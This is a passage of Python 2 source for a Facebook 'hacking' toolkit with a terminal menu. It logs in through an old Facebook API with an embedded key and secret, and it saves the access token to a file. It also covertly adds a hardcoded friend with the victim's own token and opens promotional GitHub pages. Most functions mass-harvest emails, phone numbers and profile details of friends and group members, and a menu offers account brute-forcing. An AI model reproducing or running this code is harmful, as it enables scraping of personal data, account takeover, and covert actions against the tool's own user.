pwd = getpass.getpass('\033[1;95m[+] \033[1;93mPassword \033[1;93m:\033[1;95m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\033[1;91m[!] No connection"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
zedd = open("login.txt", 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mLogin successfully'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
os.system('xdg-open https://github.com/CrazyLolz100')
menu()
except requests.exceptions.ConnectionError:
print"\n\033[1;91m[!] No connection"
keluar()
if 'checkpoint' in url:
print("\n\033[1;91m[!] \033[1;93mAccount Checkpoint")
print("\n\033[1;92m[#] Harap Login Ulang !")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\033[1;91m[!] Login Failed")
os.system('rm -rf login.txt')
time.sleep(1)
login()
##### TOKEN #####
def tokenz():
os.system('reset')
print logo
toket = raw_input("\033[1;91m[?] \033[1;92mToken\033[1;91m : \033[1;97m")
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
zedd = open("login.txt", 'w')
zedd.write(toket)
zedd.close()
menu()
except KeyError:
print "\033[1;91m[!] Wrong"
e = raw_input("\033[1;91m[?] \033[1;92mWant to pick up token?\033[1;97m[y/n]: ")
if e =="":
keluar()
elif e =="y":
login()
else:
keluar()
##### MENU ##########################################
def menu():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('reset')
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('reset')
print"\033[1;91m[!] \033[1;93mAccount Checkpoint"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\033[1;91m[!] No connection"
keluar()
os.system("reset")
print logo
print "║\033[1;91m[\033[1;96m✓\033[1;91m]\033[1;97m Name \033[1;91m: \033[1;92m"+nama+"\033[1;97m"
print "║\033[1;91m[\033[1;96m✓\033[1;91m]\033[1;97m ID \033[1;91m: \033[1;92m"+id
print "\033[1;97m╚"+40*"═"
print "\033[1;94m║--\033[1;91m> \033[1;93m1.\033[1;95m User information"
print "\033[1;94m║--\033[1;91m> \033[1;93m2.\033[1;95m Get Id/email/hp"
print "\033[1;94m║--\033[1;91m> \033[1;93m3.\033[1;95m Hack facebook account "
print "\033[1;94m║--\033[1;91m> \033[1;93m4.\033[1;95m Bot "
print "\033[1;94m║--\033[1;91m> \033[1;93m5.\033[1;95m Others "
print "\033[1;94m║--\033[1;91m> \033[1;93m6.\033[1;95m Show token "
print "\033[1;94m║--\033[1;91m> \033[1;93m7.\033[1;95m Delete trash "
print "\033[1;94m║--\033[1;91m> \033[1;93m8.\033[1;95m LogOut "
print "\033[1;94m║--\033[1;91m> \033[1;93m0.\033[1;95m Exit the programs "
print "║"
pilih()
#-
def pilih():
zedd = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if zedd =="":
print "\033[1;91m[!] Wrong input"
pilih()
elif zedd =="1":
informasi()
elif zedd =="2":
dump()
elif zedd =="3":
menu_hack()
elif zedd =="4":
menu_bot()
elif zedd =="5":
lain()
elif zedd =="6":
os.system('reset')
print logo
toket=open('login.txt','r').read()
print "\033[1;91m[+] \033[1;92mYour token\033[1;91m :\033[1;97m "+toket
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu()
elif zedd =="7":
os.remove('out')
elif zedd =="8":
os.system('rm -rf login.txt')
os.system('xdg-open https://github.com/apaansihasw779')
keluar()
elif zedd =="0":
keluar()
else:
print "\033[1;91m[!] Wrong input"
pilih()
##### INFO #####
def informasi():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
aid = raw_input('\033[1;91m[+] \033[1;92mEnter ID\033[1;97m/\033[1;92mName\033[1;91m : \033[1;97m')
jalan('\033[1;91m[✺] \033[1;92mWait a minute \033[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
cok = json.loads(r.text)
for i in cok['data']:
if aid in i['name'] or aid in i['id']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
print 42*"\033[1;97m═"
try:
print '\033[1;91m[➹] \033[1;92mName\033[1;97m : '+z['name']
except KeyError: print '\033[1;91m[?] \033[1;92mName\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mID\033[1;97m : '+z['id']
except KeyError: print '\033[1;91m[?] \033[1;92mID\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mEmail\033[1;97m : '+z['email']
except KeyError: print '\033[1;91m[?] \033[1;92mEmail\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mTelephone\033[1;97m : '+z['mobile_phone']
except KeyError: print '\033[1;91m[?] \033[1;92mTelephone\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mLocation\033[1;97m : '+z['location']['name']
except KeyError: print '\033[1;91m[?] \033[1;92mLocation\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mDate of birth\033[1;97m : '+z['birthday']
except KeyError: print '\033[1;91m[?] \033[1;92mDate of birth\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mSchool\033[1;97m : '
for q in z['education']:
try:
print '\033[1;91m ~ \033[1;97m'+q['school']['name']
except KeyError: print '\033[1;91m ~ \033[1;91mNot found'
except KeyError: pass
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu()
else:
pass
else:
print"\033[1;91m[✖] User not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu()
##### DUMP #####
def dump():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Get ID friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Get ID friend from friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Get ID Search"
print "\033[1;97m║--\033[1;91m> \033[1;92m4.\033[1;97m Get group member ID"
print "\033[1;97m║--\033[1;91m> \033[1;92m5.\033[1;97m Get group member email"
print "\033[1;97m║--\033[1;91m> \033[1;92m6.\033[1;97m Get group member phone number"
print "\033[1;97m║--\033[1;91m> \033[1;92m7.\033[1;97m Get email friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m8.\033[1;97m Get email friend from friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m9.\033[1;97m Get a friend's phone number"
print "\033[1;97m║--\033[1;91m> \033[1;92m10.\033[1;97m Get a friend's phone number from friend"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
dump_pilih()
#----- menu choice
def dump_pilih():
cuih = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if cuih =="":
print "\033[1;91m[!] Wrong input"
dump_pilih()
elif cuih =="1":
id_teman()
elif cuih =="2":
idfrom_teman()
elif cuih =="3":
os.system('reset')
print "\033[1;91mSegera"
keluar()
elif cuih =="4":
id_member_grup()
elif cuih =="5":
em_member_grup()
elif cuih =="6":
no_member_grup()
elif cuih =="7":
email()
elif cuih =="8":
emailfrom_teman()
elif cuih =="9":
nomor_hp()
elif cuih =="10":
hpfrom_teman()
elif cuih =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
dump_pilih()
##### FRIEND IDS #####
def id_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
r=requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z=json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend id \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/id_teman.txt','w')
for a in z['data']:
idteman.append(a['id'])
bz.write(a['id'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(idteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+a['id']),;sys.stdout.flush();time.sleep(0.0001)
bz.close()
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get id \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m%s"%(len(idteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/id_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### IDS FROM A FRIEND'S FRIEND LIST #####
def idfrom_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
r=requests.get("https://graph.facebook.com/"+idt+"?fields=friends.limit(5000)&access_token="+toket)
z=json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend id from friend \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/id_teman_from_teman.txt','w')
for a in z['friends']['data']:
idfromteman.append(a['id'])
bz.write(a['id'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(idfromteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+a['id']),;sys.stdout.flush();time.sleep(0.0001)
bz.close()
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get id \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m%s"%(len(idfromteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/id_teman_from_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### IDS FROM GROUP MEMBERS #####
def id_member_grup():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
jalan('\033[1;91m[✺] \033[1;92mGet group member id \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/member_grup.txt','w')
re=requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for a in s['data']:
idmem.append(a['id'])
bz.write(a['id'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(idmem))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+a['id']),;sys.stdout.flush();time.sleep(0.0001)
bz.close()
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get id \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m%s"%(len(idmem))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/member_grup.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### EMAILS FROM GROUP MEMBERS #####
def em_member_grup():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
jalan('\033[1;91m[✺] \033[1;92mGet group member email \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/em_member_grup.txt','w')
re=requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for a in s['data']:
x = requests.get("https://graph.facebook.com/"+a['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
emmem.append(z['email'])
bz.write(z['email'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(emmem))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['email']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get email from member group \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Email \033[1;91m: \033[1;97m%s"%(len(emmem))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/em_member_grup.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### NOMER FROM GRUP #####
def no_member_grup():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
jalan('\033[1;91m[✺] \033[1;92mGet group member phone number \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/no_member_grup.txt','w')
re=requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for a in s['data']:
x = requests.get("https://graph.facebook.com/"+a['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
nomem.append(z['mobile_phone'])
bz.write(z['mobile_phone'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(nomem))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['mobile_phone']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get phone number from member group \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Number \033[1;91m: \033[1;97m%s"%(len(nomem))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/no_member_grup.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### EMAIL #####
def email():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
r = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
a = json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend email \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/email_teman.txt','w')
for i in a['data']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
em.append(z['email'])
bz.write(z['email'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(em))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['email']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get email \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Email \033[1;91m: \033[1;97m%s"%(len(em))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/email_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### EMAIL FROM TEMAN #####
def emailfrom_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
r = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
a = json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend email from friend \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/em_teman_from_teman.txt','w')
for i in a['data']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
emfromteman.append(z['email'])
bz.write(z['email'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(emfromteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['email']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get email \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Email \033[1;91m: \033[1;97m%s"%(len(emfromteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/em_teman_from_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### NOMER #####
def nomor_hp():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
jalan('\033[1;91m[✺] \033[1;92mGet all friend number phone \033[1;97m...')
print 42*"\033[1;97m═"
url= "https://graph.facebook.com/me/friends?access_token="+toket
r =requests.get(url)
z=json.loads(r.text)
bz = open('out/nomer_teman.txt','w')
for n in z["data"]:
x = requests.get("https://graph.facebook.com/"+n['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
bz.write(z['mobile_phone'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(hp))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['mobile_phone']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get number \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Number \033[1;91m: \033[1;97m%s"%(len(hp))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/nomer_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### NOMER FROM TEMAN #####
def hpfrom_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
r = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
a = json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend number from friend \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/no_teman_from_teman.txt','w')
for i in a['data']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
hpfromteman.append(z['mobile_phone'])
bz.write(z['mobile_phone'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(hpfromteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['mobile_phone']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get number \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Number \033[1;91m: \033[1;97m%s"%(len(hpfromteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/no_teman_from_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### MENU HACK #####
def menu_hack():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;93m║--\033[1;93m> \033[1;93m1.\033[1;94m Mini Hack Facebook(\033[1;92mTarget\033[1;97m)"
print "\033[1;93m║--\033[1;93m> \033[1;93m2.\033[1;94m Multi Bruteforce Facebook"
print "\033[1;93m║--\033[1;93m> \033[1;93m3.\033[1;94m Super Multi Bruteforce Facebook"
print "\033[1;93m║--\033[1;93m> \033[1;93m4.\033[1;94m BruteForce(\033[1;92mTarget\033[1;97m)"
print "\033[1;93m║--\033[1;93m> \033[1;93m5.\033[1;94m Yahoo Checker"
print "\033[1;93m║--\033[1;93m> \033[1;93m0.\033[1;94m Back"
print "║"
hack_pilih()
#----pilih
def hack_pilih():
hack = raw_input("\033[1;95m╚═\033[1;95mD \033[1;95m")
if hack=="":
print "\033[1;91m[!] Wrong input"
hack_pilih()
elif hack =="1":
mini()
elif hack =="2":
crack()
hasil()
